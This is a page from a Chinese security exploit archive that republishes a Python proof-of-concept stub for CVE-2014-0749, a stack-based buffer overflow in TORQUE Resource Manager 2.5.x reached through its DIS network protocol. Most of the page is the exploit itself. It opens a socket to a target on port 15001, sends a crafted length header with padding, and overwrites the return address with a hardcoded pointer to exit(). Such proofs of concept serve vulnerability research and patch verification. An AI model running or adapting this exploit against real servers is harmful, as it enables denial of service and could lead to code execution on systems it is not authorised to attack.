首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub
来源:@botnet_hunter 作者:bwall 发布时间:2014-05-29  
#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
# Date: 27 May 2014
# Exploit Author: bwall - @botnet_hunter
# Vulnerability discovered by: MWR Labs
# CVE: CVE-2014-0749
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version: 2.5.13
# Tested on: Manjaro x64
# Description:
# A buffer overflow while parsing the DIS network communication protocol.  It is triggered when requesting that
# a larger amount of data than the small buffer be read.  The first digit supplied is the number of digits in the
# data, the next digits are the actual size of the buffer.
#
# This is an exploit stub, meant to be a quick proof of concept.  This was built and tested for a 64 bit system
# with ASLR disabled.  Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
# compiled on the target system.  The result of this exploit is intended to just point RIP at 'exit()'
  
import socket
  
  
ip = "172.16.246.177"
port = 15001
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
  
offset = 143
header = str(len(str(offset))) + str(offset) + '1'
  
packet = header
packet += "\x00" * (140 - len(packet))
packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build
  
s.sendall(packet)
data = s.recv(1024)
s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy File Sharing FTP Server 3
·Wireshark CAPWAP Dissector - D
·Microsoft Internet Explorer 11
·Core FTP Server Version 1.2, b
·ElasticSearch Dynamic Script A
·Dotclear Media Manager Authent
·Ubuntu 12.04.0-2LTS x64 perf_s
·LL Page Mitigations On Windows
·Easy File Management Web Serve
·Easy Address Book Web Server 1
·dbus-glib pam_fprintd - Local
·Easy File Management Web Serve
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved